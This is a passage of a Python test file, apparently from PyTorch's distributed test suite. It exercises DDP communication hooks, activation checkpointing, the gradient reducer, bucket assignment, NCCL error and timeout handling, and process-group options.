It also checks whether an error is thrown if the return type is incorrect and
the user hasn't specified any return type annotation.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
with self.assertRaisesRegex(
ValueError,
"Communication hook: return annotation should be torch.futures.Future or torch._C.Future.",
):
def comm_hook(state: object, bucket: dist.GradBucket) -> int:
return torch.futures.Future()
model.register_comm_hook(state=None, hook=comm_hook)
with self.assertRaisesRegex(
RuntimeError,
"callback must return a torch.futures.Future or torch._C.Future object, but got",
):
def comm_hook(state: object, bucket: dist.GradBucket):
return 1
model.register_comm_hook(state=None, hook=comm_hook)
# Run forward
output = model(8, self.rank)
# Run backward
output.mean().backward()
@requires_gloo()
def test_ddp_comm_hook_register_just_once(self):
"""
DDP communication hook can only be registered once. This test validates whether
the error is thrown properly when register_comm_hook is called more than once.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
model = DistributedDataParallel(
ModuleForDdpCommHook(), process_group=process_group
)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result(bucket.get_tensors())
return fut
model.register_comm_hook(None, dummy_hook)
with self.assertRaisesRegex(
RuntimeError,
"register_comm_hook or register_builtin_comm_hook can only be called once.",
):
model.register_comm_hook(None, dummy_hook)
@requires_gloo()
def test_ddp_comm_hook_sparse_gradients(self):
"""
Runs "test_sparse_gradients" unit test with DDP communication hook. We define a
simple hook that does allreduce and works with gloo backend for this test.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Ensure initialized weights and inputs are identical across processes
torch.manual_seed(1337)
vanilla_model = SparseGradientModule()
ddp_model = DistributedDataParallel(
copy.deepcopy(vanilla_model),
process_group=process_group,
)
# "get_future" API does not support gloo backend, see GH Issue #42048.
# Instead, we wait for an allreduce work, and write its result to a Future.
def allreduce_hook_gloo(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future:
# Prepare allreduced grad bucket tensors by running an async work.
work = process_group.allreduce(bucket.get_tensors())
work.wait()
fut = torch.futures.Future()
fut.set_result([t / self.world_size for t in bucket.get_tensors()])
return fut
ddp_model.register_comm_hook(None, allreduce_hook_gloo)
self._run_and_verify_sparse_gradients(vanilla_model, ddp_model)
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(self.AcceptsParam(p, dev + 1),
self.AcceptsParam(p, dev + 1)).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(p, 2. * (world * (world + 1.) / 2.) / world, device=dev)
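# Sanity check of the formula above for world_size == 2: the per-rank grads are
# 2. and 4., whose allreduced average is 3. == world + 1, matching `analytic`.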
for name, p in m.named_parameters():
self.assertEqual(p.grad, analytic, "mismatch at " + name + ".grad for " +
"set_to_none = {}, use_bucket_view = {}".format(try_set_to_none,
use_bucket_view))
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are referred to
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
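# Background for the failure cases below (roughly): checkpointing hides the
# checkpointed layer from the forward-time autograd graph and recomputes it
# during backward, so DDP's per-parameter hooks can fire at unexpected times or
# more than once. With find_unused_parameters=True, or when the same layer is
# checkpointed twice, this trips the "Expected to mark a variable ready only
# once." error exercised by the tests further down.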
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(2000, 2000)
self.l2 = nn.Linear(2000, 2000)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _test_ddp_checkpointing(self, checkpoint_once, process_group, use_bucket_view, find_unused_parameters=False):
# Fix the device and seed to reproduce the same training results.
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
if checkpoint_once:
model = self.CheckpointOnceModule().cuda()
else:
model = self.CheckpointTwiceModule().cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = model(input_tensor)
output_tensor.sum().backward()
return model
# DDP works as expected when a layer is checkpointed only once
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view)
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 78053), norm
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=True,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP will fail when the same layer is checkpointed twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(checkpoint_once=False,
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@unittest.skip("TODO: Test is always failing - https://github.com/pytorch/pytorch/issues/55071")
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view in (True, False):
torch.manual_seed(31415)
l1 = nn.Linear(2000, 2000)
l2 = nn.Linear(2000, 2000)
l1.weight = l2.weight
model = nn.Sequential(l1, l2).cuda()
model = nn.parallel.DistributedDataParallel(model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group)
input_tensor = torch.rand((64, 2000), device="cuda", requires_grad=True)
output_tensor = checkpoint(model, input_tensor)
output_tensor.sum().backward()
norm = 0.0
for p in model.parameters():
self.assertTrue(p.grad is not None)
norm += p.grad.norm().item()
assert numpy.allclose(norm, 57004), norm
class ReducerModule(nn.Module):
def __init__(self):
super(ReducerModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, use_fc3=True):
x = self.relu(self.fc1(x)).float()
x = self.relu(self.fc2(x)).float()
if use_fc3:
x = self.fc3(x).float()
return F.softmax(x, dim=1)
@requires_gloo()
class ReducerTest(TestCase):
def setUp(self):
self.file = tempfile.NamedTemporaryFile(delete=False)
self.store = c10d.FileStore(self.file.name, 1)
self.process_group = c10d.ProcessGroupGloo(self.store, 0, 1)
def test_single_dtype_single_bucket(self):
model = ReducerModule()
parameters = list(model.parameters())
buckets = [list(range(len(parameters)))]
dist.Reducer([parameters], buckets, self.process_group)
def _create_mixed_precision_model(self):
model = ReducerModule()
model.float()
model.fc1.double()
return model
def test_multi_dtype_single_bucket(self):
model = self._create_mixed_precision_model()
# Raise if there are multiple types per bucket.
# In this case we create one bucket for all parameters.
with self.assertRaises(RuntimeError):
parameters = [list(model.parameters())]
buckets = [list(range(len(parameters[0])))]
dist.Reducer(parameters, buckets, self.process_group)
def test_multi_dtype_multi_bucket(self):
model = self._create_mixed_precision_model()
parameters = [list(model.parameters())]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
dist.Reducer(parameters, buckets, self.process_group)
def _create_reducer_for_models(self, models, find_unused_parameters=False):
parameters = [list(model.parameters()) for model in models]
group_by_dtype = groupby(
range(len(parameters[0])), key=lambda i: parameters[0][i].dtype
)
buckets = [list(indices) for _, indices in group_by_dtype]
return dist.Reducer(
parameters,
buckets,
self.process_group,
find_unused_parameters=find_unused_parameters,
)
def test_forward_backward_single_replica(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model])
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input), target)
reducer.prepare_for_backward(output)
output.backward()
def test_forward_backward_multi_replica(self):
batch_size = 10
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
reducer = self._create_reducer_for_models(models)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double).chunk(num_replicas)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
outputs = [models[i](input[i]) for i in range(num_replicas)]
output = loss(torch.cat(outputs), target)
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have reduced the gradients for all model replicas.
# Verify that they are equal across model replicas.
for parameters in zip(*[model.parameters() for model in models]):
for parameter in parameters:
self.assertEqual(parameters[0].grad, parameter.grad)
def test_forward_backward_unused_parameters(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
output = loss(model(input, use_fc3=False), target)
# Check that the grad of fc3 is not set.
self.assertEqual(None, model.fc3.weight.grad)
# Compute and accumulate gradients.
reducer.prepare_for_backward(output)
output.backward()
# The reducer will have marked the grad of fc3 as ready, because
# it doesn't show up in the autograd graph of `output`. Since fc3.weight
# is considered being globally unused, it will be kept untouched as None.
self.assertEqual(None, model.fc3.weight.grad)
def test_forward_backward_optimizer(self):
batch_size = 10
model = self._create_mixed_precision_model()
reducer = self._create_reducer_for_models([model], find_unused_parameters=True)
reducer.prepare_for_forward()
loss = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters())
for i in range(3):
input = torch.rand([batch_size, 2], dtype=torch.double)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# The `zero_grad` function calls `detach_` and `zero_` on the grad
# tensors of model parameters. If we tried to set the grad tensors
# to a view of the reducer's bucket tensors, this would blow up.
optimizer.zero_grad()
# Unused parameter only in the first iteration.
output = loss(model(input, use_fc3=(i > 0)), target)
reducer.prepare_for_backward(output)
output.backward()
optimizer.step()
def test_ddp_comm_hook_multiple_replica_check(self):
"""
DDP communication hook does not support single process multiple device mode.
This unit test validates this condition is properly checked by reducer.
Related to GH Issue #42542.
"""
num_replicas = 2
models = [self._create_mixed_precision_model() for _ in range(num_replicas)]
reducer = self._create_reducer_for_models(models)
def dummy_hook(state, bucket):
fut = torch.futures.Future()
fut.set_result(bucket.get_tensors())
return fut
with self.assertRaisesRegex(
RuntimeError,
"Communication hook does not support single-process multiple-device mode.",
):
dist._register_comm_hook(reducer, None, dummy_hook)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [400])
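# Buckets are built per dtype and capped by the byte limit (an assumption based on the
# expected result below): each 50-element fp32 tensor and each 25-element fp64 tensor
# is 200 bytes, so two same-dtype tensors fill a 400-byte bucket and the leftover
# tensors each get a bucket of their own.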
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result = dist._compute_bucket_assignment_by_size(tensors, [40, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result = dist._compute_bucket_assignment_by_size(tensors, [200, 400])
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._fork_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get("NCCL_ASYNC_ERROR_HANDLING", None)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block the Python thread, as allreduce only enqueues
# the CUDA operation and wait only blocks the current CUDA stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure CUDA has not gotten stuck.
# It was observed that CUDA could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (e.g. FileStore files) before going down.
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version(2400, "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# Watchdog may abort timed out work resulting in NCCL error instead of operation timed out.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class CommTest(MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are identical to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_gloo_cuda(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cuda:%d" % self.rank)
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_broadcast_coalesced_gloo_cpu(self):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
device = torch.device("cpu")
ranks = list(range(self.world_size))
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_gloo()
def test_pass_gloo_options(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
pg_opts._devices = [create_device(interface=LOOPBACK)]
pg_opts._threads = 2
store = c10d.FileStore(self.file_name, self.world_size)
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
default_pg = c10d.distributed_c10d._get_default_group()
# Test that devices are properly set on the options if the user doesn't set them.
no_device_thread_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_thread_pg = dist.new_group([0, 1], pg_options=no_device_thread_pg_opts)
self.assertTrue(len(no_device_thread_pg.options._devices) != 0)
# Ensure the created pg has the correct timeout set instead of the default timeout.
self.assertEqual(no_device_thread_pg.options.timeout, timedelta(seconds=10))
# If the user passes in Options with threads set but no devices, it should error out.
no_device_pg_opts = c10d.ProcessGroupGloo.Options(timeout=timedelta(seconds=10))
no_device_pg_opts._threads = 4
with self.assertRaisesRegex(
RuntimeError, "threads and devices must be passed in together"
):
no_device_pg = dist.new_group([0, 1], pg_options=no_device_pg_opts)
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
@requires_gloo()
def test_pass_gloo_options_and_timeout(self):
pg_opts = c10d.ProcessGroupGloo.Options()
pg_opts.timeout = timedelta(seconds=10)
store = c10d.FileStore(self.file_name, self.world_size)
# Setting both the timeout argument and a timeout in pg_options should error out.
with self.assertRaisesRegex(
RuntimeError, "timeout value defined in pg_options are conflicting"
):
dist.init_process_group(
"gloo",
world_size=self.world_size,
rank=self.rank,
store=store,
timeout=timedelta(20),
pg_options=pg_opts
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# Test that the process group was constructed with a high priority stream.
self.assertTrue(pg.options.is_high_priority_stream)
# Test that the process group works as expected.
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
@requires_gloo()
def test_gloo_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="gloo", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "device_ids not supported"):
c10d.barrier(device_ids=[self.rank])
def test_distributed_debug_mode(self):
# Default should be off
default_debug_mode = dist._get_debug_mode()
self.assertEqual(default_debug_mode, dist._DistributedDebugLevel.OFF)
mapping = {
"OFF": dist._DistributedDebugLevel.OFF,
"INFO": dist._DistributedDebugLevel.INFO,
"DETAIL": dist._DistributedDebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
set_debug_mode = dist._get_debug_mode()
self.assertEqual(
set_debug_mode,
